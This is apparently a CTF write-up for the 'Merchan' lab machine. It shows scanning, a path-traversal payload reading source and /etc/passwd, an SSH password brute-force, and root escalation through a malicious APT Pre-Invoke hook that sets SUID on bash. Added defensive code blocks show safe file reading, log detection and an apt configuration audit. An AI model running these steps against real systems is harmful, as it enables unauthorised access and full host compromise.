
Thehackerslabs-Merchan

·769 words·4 minutes
Thehackerslabs Linux Thehackerslabs
Author: HYH
A technology enthusiast focused on cybersecurity, penetration testing and CTF challenges, keen on documenting hands-on experience and sharing tools and techniques, and committed to continuous learning and growth.

Nmap

[root@kali] /home/kali/merchan  
❯ nmap 192.168.55.77 -sV -A -p-                                                                                                                
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-04 23:07 EDT
Nmap scan report for 192.168.55.77
Host is up (0.00028s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.2p1 Debian 2+deb12u4 (protocol 2.0)
| ssh-hostkey: 
|   256 da:68:54:15:39:b8:44:ed:b9:08:4c:59:e5:89:50:08 (ECDSA)
|_  256 b4:7d:98:a8:01:e8:3b:17:43:24:43:39:3a:b4:b8:50 (ED25519)
80/tcp open  http    Apache httpd 2.4.62
|_http-title: Did not follow redirect to http://merchan.thl
|_http-server-header: Apache/2.4.62 (Debian)

Feroxbuster

[root@kali] /home/kali/merchan  
❯ feroxbuster -u 'http://www.merchan.thl/' -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x js                              ⏎
                                                                                                                                                
 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓                 ver: 2.11.0
───────────────────────────┬──────────────────────
 🎯  Target Url            │ http://www.merchan.thl/
 🚀  Threads               │ 50
 📖  Wordlist              │ /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
 👌  Status Codes          │ All Status Codes!
 💥  Timeout (secs)        │ 7
 🦡  User-Agent            │ feroxbuster/2.11.0
 💉  Config File           │ /etc/feroxbuster/ferox-config.toml
 🔎  Extract Links         │ true
 💲  Extensions            │ [js]
 🏁  HTTP methods          │ [GET]
 🔃  Recursion Depth       │ 4
───────────────────────────┴──────────────────────
 🏁  Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404      GET        9l       31w      277c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
403      GET        9l       28w      280c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
301      GET        9l       28w      319c http://www.merchan.thl/images => http://www.merchan.thl/images/
200      GET        8l       29w    28898c http://www.merchan.thl/assets/favicon.ico
200      GET      139l      592w    68236c http://www.merchan.thl/images/camiseta.jpg
200      GET        7l       36w      330c http://www.merchan.thl/js/scripts.js
200      GET      186l      943w    74237c http://www.merchan.thl/images/llavero.jpg
200      GET    10826l    22299w   236792c http://www.merchan.thl/css/styles.css
301      GET        9l       28w      319c http://www.merchan.thl/assets => http://www.merchan.thl/assets/
200      GET      563l     3920w   380306c http://www.merchan.thl/images/sudadera.png
200      GET      130l      399w     7235c http://www.merchan.thl/
301      GET        9l       28w      316c http://www.merchan.thl/css => http://www.merchan.thl/css/
301      GET        9l       28w      315c http://www.merchan.thl/js => http://www.merchan.thl/js/
200      GET        1l       15w     1365c http://www.merchan.thl/secret.js
[####################] - 3m   1102751/1102751 0s      found:12      errors:0      
[####################] - 5m   1102751/1102751 0s      found:12      errors:0      
[####################] - 5m    220546/220546  740/s   http://www.merchan.thl/ 
[####################] - 5m    220546/220546  726/s   http://www.merchan.thl/images/ 
[####################] - 5m    220546/220546  729/s   http://www.merchan.thl/assets/ 
[####################] - 5m    220546/220546  729/s   http://www.merchan.thl/css/ 
[####################] - 5m    220546/220546  727/s   http://www.merchan.thl/js/

A secret.js file turns up:

function createLink() {
  const _0x199a7f = document.createElement('a');
  _0x199a7f.innerText = "Haga click aqui";
  _0x199a7f.href = '2e81eb4e952a3268babddecad2a4ec1e.php';
  document.body.appendChild(_0x199a7f);
}
createLink();

This reveals a PHP file, but it cannot be accessed directly.

Nuclei

[root@kali] /home/kali  
❯ nuclei -u http://merchan.thl/2e81eb4e952a3268babddecad2a4ec1e.php                      

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.4.2

                projectdiscovery.io

[INF] Current nuclei version: v3.4.2 (outdated)
[INF] Current nuclei-templates version: v10.2.2 (latest)
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 65
[INF] Templates loaded for current scan: 7991
[INF] Executing 7793 signed templates from projectdiscovery/nuclei-templates
[WRN] Loading 198 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 1
[INF] Templates clustered: 1743 (Reduced 1638 Requests)
[INF] Using Interactsh Server: oast.online
[waf-detect:apachegeneric] [http] [info] http://merchan.thl/2e81eb4e952a3268babddecad2a4ec1e.php
[openssh-detect] [tcp] [info] merchan.thl:22 ["SSH-2.0-OpenSSH_9.2p1 Debian-2+deb12u4"]
[ssh-auth-methods] [javascript] [info] merchan.thl:22 ["["publickey","password"]"]
[ssh-server-enumeration] [javascript] [info] merchan.thl:22 ["SSH-2.0-OpenSSH_9.2p1 Debian-2+deb12u4"]
[ssh-sha1-hmac-algo] [javascript] [info] merchan.thl:22
[ssh-password-auth] [javascript] [info] merchan.thl:22
[CVE-2020-19360] [http] [high] http://merchan.thl/2e81eb4e952a3268babddecad2a4ec1e.php/fhem/FileLog_logWrapper?dev=Logfile&file=%2fetc%2fpasswd&type=text
[carel-bacnet-gateway-traversal] [http] [high] http://merchan.thl/2e81eb4e952a3268babddecad2a4ec1e.php/usr-cgi/logdownload.cgi?file=../../../../../../../../etc/passwd
[CVE-2011-3315] [http] [high] http://merchan.thl/2e81eb4e952a3268babddecad2a4ec1e.php/ccmivr/IVRGetAudioFile.do?file=../../../../../../../../../../../../../../../etc/passwd
[http-missing-security-headers:x-permitted-cross-domain-policies] [http] [info] http://merchan.thl/2e81eb4e952a3268babddecad2a4ec1e.php
[http-missing-security-headers:clear-site-data] [http] [info] http://merchan.thl/2e81eb4e952a3268babddecad2a4ec1e.php
[http-missing-security-headers:cross-origin-opener-policy] [http] [info] http://merchan.thl/2e81eb4e952a3268babddecad2a4ec1e.php
[http-missing-security-headers:cross-origin-resource-policy] [http] [info] http://merchan.thl/2e81eb4e952a3268babddecad2a4ec1e.php
[http-missing-security-headers:content-security-policy] [http] [info] http://merchan.thl/2e81eb4e952a3268babddecad2a4ec1e.php
[http-missing-security-headers:x-content-type-options] [http] [info] http://merchan.thl/2e81eb4e952a3268babddecad2a4ec1e.php
[http-missing-security-headers:referrer-policy] [http] [info] http://merchan.thl/2e81eb4e952a3268babddecad2a4ec1e.php
[http-missing-security-headers:cross-origin-embedder-policy] [http] [info] http://merchan.thl/2e81eb4e952a3268babddecad2a4ec1e.php
[http-missing-security-headers:strict-transport-security] [http] [info] http://merchan.thl/2e81eb4e952a3268babddecad2a4ec1e.php
[http-missing-security-headers:permissions-policy] [http] [info] http://merchan.thl/2e81eb4e952a3268babddecad2a4ec1e.php
[http-missing-security-headers:x-frame-options] [http] [info] http://merchan.thl/2e81eb4e952a3268babddecad2a4ec1e.php
[caa-fingerprint] [dns] [info] merchan.thl

The scan shows a file read vulnerability, so try reading the endpoint's own source 👇

http://merchan.thl/2e81eb4e952a3268babddecad2a4ec1e.php/ccmivr/IVRGetAudioFile.do?file=../../../../../../../../../../../../../../../var/www/html/2e81eb4e952a3268babddecad2a4ec1e.php

<?php
// Vulnerable endpoint as recovered from the box: the ?file= value reaches
// file_get_contents() with no validation, so any path readable by the web
// server user can be returned.
$file = $_GET['file'] ?? '';
if ($file) {
    echo nl2br(file_get_contents($file));
}
?>

However, a PHP filter chain attack could not be used here, so read /etc/passwd instead:

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
_apt:x:42:65534::/nonexistent:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:998:998:systemd Network Management:/:/usr/sbin/nologin
messagebus:x:100:107::/nonexistent:/usr/sbin/nologin
sshd:x:101:65534::/run/sshd:/usr/sbin/nologin
julia:x:1001:1001:,,,:/home/julia:/bin/bash
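The handler recovered above hands `$_GET['file']` straight to `file_get_contents()`. As an added example (not code from the writeup or the machine), the following Python version shows the same read-by-name feature confined to one base directory: the name is joined to a fixed root, resolved with `realpath()` so `..` and symlinks are canonicalised, and rejected unless the result still lies under that root. The web root, file names, contents and the escaping symlink are all constructed for the demo.

```python
"""Added example, not code from the writeup or the target machine.

The PHP handler above hands $_GET['file'] straight to file_get_contents(),
so '../' sequences, absolute paths and stream wrappers all reach it. This
Python version confines every read to one base directory and shows the
request forms from the writeup being rejected. Base directory, file names
and contents are constructed for the demo."""
import os
import tempfile


class PathNotAllowed(Exception):
    """Raised when the resolved target leaves the permitted base directory."""


def safe_read(base_dir: str, requested: str) -> str:
    """Read `requested` only if it resolves to a regular file inside base_dir."""
    if "\x00" in requested or os.path.isabs(requested):
        # Null bytes truncate paths in C APIs; an absolute path would make
        # os.path.join() discard base_dir entirely.
        raise PathNotAllowed(requested)
    base = os.path.realpath(base_dir)
    # realpath() collapses '..' and follows symlinks, so a link inside the
    # web root that points outside it is caught by the containment check.
    target = os.path.realpath(os.path.join(base, requested))
    # commonpath() rather than startswith(): '/srv/www2' starts with
    # '/srv/www' but is not inside it.
    if os.path.commonpath([base, target]) != base:
        raise PathNotAllowed(requested)
    if not os.path.isfile(target):
        raise FileNotFoundError(requested)
    with open(target, encoding="utf-8", errors="replace") as fh:
        return fh.read()


def run_demo() -> dict:
    """Build a constructed web root plus one file outside it and a symlink
    that escapes, then try the request shapes seen in the writeup."""
    root = tempfile.mkdtemp(prefix="merchan-demo-")
    base = os.path.join(root, "html")
    os.mkdir(base)
    with open(os.path.join(base, "catalog.txt"), "w", encoding="utf-8") as fh:
        fh.write("camiseta, llavero, sudadera\n")        # constructed content
    with open(os.path.join(root, "outside.txt"), "w", encoding="utf-8") as fh:
        fh.write("not for the web\n")                    # constructed content
    os.symlink(os.path.join(root, "outside.txt"), os.path.join(base, "link.txt"))

    requests = (
        "catalog.txt",                      # legitimate
        "../outside.txt",                   # classic traversal
        "/etc/passwd",                      # absolute path
        "link.txt",                         # symlink escaping the root
        "php://filter/convert.base64-encode/resource=catalog.txt",  # wrapper string
    )
    results = {}
    for req in requests:
        try:
            results[req] = safe_read(base, req)
        except PathNotAllowed:
            results[req] = "BLOCKED"
        except FileNotFoundError:
            results[req] = "NOT FOUND"
    return results


if __name__ == "__main__":
    for req, outcome in run_demo().items():
        print(f"{req!r:65} -> {outcome.strip()}")
```

In PHP the equivalent is `realpath()` plus a containment test against the web root; `realpath()` returns `false` for anything that is not an existing filesystem path, which includes `php://filter` wrapper strings, so the same check also closes the wrapper route.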

Hydra

Brute-force the SSH login:

[root@kali] /home/kali/merchan  
❯ hydra -l julia -P /usr/share/wordlists/rockyou.txt ssh://192.168.55.78 -I -V 
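From the defender's side, both loud steps in this walkthrough leave obvious traces: the traversal payloads nuclei fired at the PHP endpoint land in the Apache access log, and hydra's guessing produces a burst of `Failed password` lines in `auth.log`. The following Python block is an added example (not from the writeup) that flags both: a decode-then-match check over access-log lines, and a sliding-window failure counter per source that also records whether a login from that source succeeded afterwards. The log lines, source IPs, ports and timestamps are constructed; only the endpoint name comes from the page.

```python
"""Added detection example, not part of the original writeup. Two checks a
defender can run over server logs for the noisy steps shown above: the
traversal probes sent to the PHP endpoint and hydra's SSH password
guessing. Every log line below is constructed for the demo; the source IPs,
ports and timestamps are made up."""
import re
from collections import defaultdict
from datetime import datetime
from urllib.parse import unquote

# Apache combined format; only the fields the check needs are captured.
APACHE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')
# sshd password outcomes as written to auth.log (syslog lines carry no year).
SSHD = re.compile(
    r"^(?P<mon>[A-Z][a-z]{2}) +(?P<day>\d+) (?P<time>\d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) from (?P<ip>\S+)")

WEB_LOG = [  # constructed; the endpoint name is the one from the writeup
    '192.168.55.20 - - [04/Jun/2025:23:20:11 -0400] "GET /2e81eb4e952a3268babddecad2a4ec1e.php/ccmivr/IVRGetAudioFile.do?file=../../../../etc/passwd HTTP/1.1" 200 1843 "-" "scanner"',
    '192.168.55.20 - - [04/Jun/2025:23:20:12 -0400] "GET /2e81eb4e952a3268babddecad2a4ec1e.php?file=%2e%2e%2f%2e%2e%2fetc%2fpasswd HTTP/1.1" 200 1843 "-" "Mozilla/5.0"',
    '192.168.55.20 - - [04/Jun/2025:23:20:13 -0400] "GET /2e81eb4e952a3268babddecad2a4ec1e.php?file=php://filter/convert.base64-encode/resource=index.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [04/Jun/2025:23:21:00 -0400] "GET /images/camiseta.jpg HTTP/1.1" 200 68236 "-" "Mozilla/5.0"',
]
SSH_LOG = [  # constructed: seven failures in seven seconds, then a success
    f"Jun  4 23:30:{s:02d} merchan sshd[21{s:02d}]: Failed password for julia from 192.168.55.20 port 5{s:04d} ssh2"
    for s in range(1, 8)
] + [
    "Jun  4 23:30:08 merchan sshd[2108]: Accepted password for julia from 192.168.55.20 port 50008 ssh2",
    "Jun  4 23:31:10 merchan sshd[2109]: Failed password for invalid user admin from 10.0.0.9 port 40001 ssh2",
]


def flag_traversal(lines):
    """Return requests whose decoded path carries traversal or wrapper markers."""
    hits = []
    for line in lines:
        m = APACHE.match(line)
        if not m:
            continue
        decoded = unquote(m["path"]).lower()   # one decode so %2e%2e%2f reads as ../
        reasons = [marker for marker in ("../", "/etc/passwd", "php://") if marker in decoded]
        if reasons:
            hits.append({"ip": m["ip"], "path": m["path"], "status": m["status"], "reasons": reasons})
    return hits


def flag_ssh_guessing(lines, threshold=5, window_s=60, year=2025):
    """Flag a source after `threshold` failed passwords inside a sliding window
    of window_s seconds, and note whether that source later logs in."""
    recent = defaultdict(list)   # ip -> failure timestamps still inside the window
    users = defaultdict(set)     # ip -> usernames tried
    total = defaultdict(int)
    flagged = {}
    for line in lines:
        m = SSHD.match(line)
        if not m:
            continue
        ts = datetime.strptime(f"{m['mon']} {m['day']} {m['time']} {year}", "%b %d %H:%M:%S %Y")
        ip = m["ip"]
        if m["result"] == "Failed":
            total[ip] += 1
            users[ip].add(m["user"])
            recent[ip] = [t for t in recent[ip] if (ts - t).total_seconds() <= window_s] + [ts]
            if len(recent[ip]) >= threshold and ip not in flagged:
                flagged[ip] = {"success_after": False}
        elif ip in flagged:
            flagged[ip]["success_after"] = True   # a login after guessing is the signal to act on
    for ip, entry in flagged.items():
        entry["failures"] = total[ip]
        entry["users"] = sorted(users[ip])
    return flagged


if __name__ == "__main__":
    for hit in flag_traversal(WEB_LOG):
        print("traversal", hit["ip"], hit["status"], hit["reasons"], hit["path"])
    for ip, info in flag_ssh_guessing(SSH_LOG).items():
        print("ssh-guessing", ip, info)
```

The `success_after` flag is the one to page on: failures alone may be a misconfigured client, but a successful login from a source that just failed several times within a minute is exactly the pattern the `julia` compromise on this box would show. The same per-source threshold is what fail2ban's sshd jail keys on.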

Root

Upload pspy.

It also turns out that the apt configuration directory is writable:

julia@Thehackerslabs-merchan:/tmp$ ls -al /etc/apt/
total 36
drwxr-xr-x  8 root root 4096 ene 21 09:58 .
drwxr-xr-x 69 root root 4096 ene 27 18:53 ..
drwxr-xrwx  2 root root 4096 ene 24 09:27 apt.conf.d
drwxr-xr-x  2 root root 4096 may 25  2023 auth.conf.d
drwxr-xr-x  2 root root 4096 may 25  2023 keyrings
drwxr-xr-x  2 root root 4096 may 25  2023 preferences.d
-rw-r--r--  1 root root  780 ene 21 09:58 sources.list
-rw-r--r--  1 root root    0 ene 21 09:51 sources.list~
drwxr-xr-x  2 root root 4096 may 25  2023 sources.list.d
drwxr-xr-x  2 root root 4096 ene 21 09:51 trusted.gpg.d

Write the malicious configuration and script:

$ echo 'chmod +s /bin/bash' > /tmp/myevil.sh
$ chmod +x /tmp/myevil.sh
$ echo 'APT::Update::Pre-Invoke { "/tmp/myevil.sh"; };' > /etc/apt/apt.conf.d/99evil
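The world-writable `apt.conf.d` is the root cause here: apt runs `Pre-Invoke`/`Post-Invoke` commands as root, so any fragment dropped into that directory executes with full privileges the next time apt runs. The following Python block is an added example (not from the writeup) of an audit that reports group/world-writable apt directories and parses every fragment for hook options whose command does not start from a package-managed path. `run_demo()` rebuilds a constructed copy of the layout under a temp directory, including the `drwxr-xrwx` mode and a `99evil` fragment with the hook from the walkthrough, so it never touches the real `/etc/apt`.

```python
"""Added example, not from the writeup. An audit of the apt configuration
surface abused above: it reports group/world-writable entries under an apt
directory and parses every apt.conf.d fragment for Pre-Invoke / Post-Invoke
hooks, flagging hooks whose command does not start from a root-managed path.
run_demo() builds a constructed copy in a temp directory, reproducing the
drwxr-xrwx apt.conf.d from the listing, so nothing under the real /etc/apt
is touched."""
import os
import re
import stat
import tempfile

# apt options whose values are shell commands that apt runs as root.
HOOK_KEYS = ("APT::Update::Pre-Invoke", "APT::Update::Post-Invoke",
             "APT::Update::Post-Invoke-Success", "DPkg::Pre-Invoke",
             "DPkg::Post-Invoke", "DPkg::Pre-Install-Pkgs")
# Matches either the list form  Key { "cmd"; };  or the scalar form  Key "cmd";
HOOK_RE = re.compile(r"(" + "|".join(re.escape(k) for k in HOOK_KEYS) + r')\s*(\{[^}]*\}|"[^"]*")',
                     re.IGNORECASE)
# Hook commands are expected to start with a binary from a package-managed tree.
TRUSTED_PREFIXES = ("/usr/", "/bin/", "/sbin/")


def audit_apt_dir(apt_dir):
    """Return findings for apt_dir (the /etc/apt equivalent) and its apt.conf.d."""
    findings = []
    conf_d = os.path.join(apt_dir, "apt.conf.d")
    for d in (apt_dir, conf_d):
        mode = os.stat(d).st_mode
        if mode & (stat.S_IWGRP | stat.S_IWOTH):   # anyone but root can drop a fragment here
            findings.append({"type": "writable-dir", "path": d, "mode": oct(stat.S_IMODE(mode))})
    for name in sorted(os.listdir(conf_d)):
        path = os.path.join(conf_d, name)
        if not os.path.isfile(path):
            continue
        with open(path, encoding="utf-8", errors="replace") as fh:
            text = fh.read()
        for key, value in HOOK_RE.findall(text):
            for cmd in re.findall(r'"([^"]*)"', value):
                first = cmd.split()[0] if cmd.split() else ""
                if not first.startswith(TRUSTED_PREFIXES):
                    findings.append({"type": "hook", "file": path, "key": key, "command": cmd})
    return findings


def run_demo():
    """Constructed /etc/apt look-alike with one benign hook and the hook from the box."""
    root = tempfile.mkdtemp(prefix="apt-audit-demo-")
    apt_dir = os.path.join(root, "apt")
    conf_d = os.path.join(apt_dir, "apt.conf.d")
    os.makedirs(conf_d)
    os.chmod(apt_dir, 0o755)
    os.chmod(conf_d, 0o757)          # reproduces drwxr-xrwx from the listing above
    fragments = {                    # constructed fragments
        "01autoremove": 'APT::NeverAutoRemove { "^firmware-linux.*"; };\n',      # no hook key
        "50benign": 'DPkg::Post-Invoke { "/usr/bin/touch /var/lib/apt/demo-stamp"; };\n',
        "99evil": 'APT::Update::Pre-Invoke { "/tmp/myevil.sh"; };\n',          # as written in the walkthrough
    }
    for name, text in fragments.items():
        with open(os.path.join(conf_d, name), "w", encoding="utf-8") as fh:
            fh.write(text)
    return audit_apt_dir(apt_dir)


if __name__ == "__main__":
    for finding in run_demo():
        print(finding)
```

Point `audit_apt_dir("/etc/apt")` at a real host to audit it. A natural extension is to stat the script each hook names and require it to be root-owned and not group/world-writable; the fix for the box itself is `chmod 755 /etc/apt/apt.conf.d` plus removing the foreign fragment.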
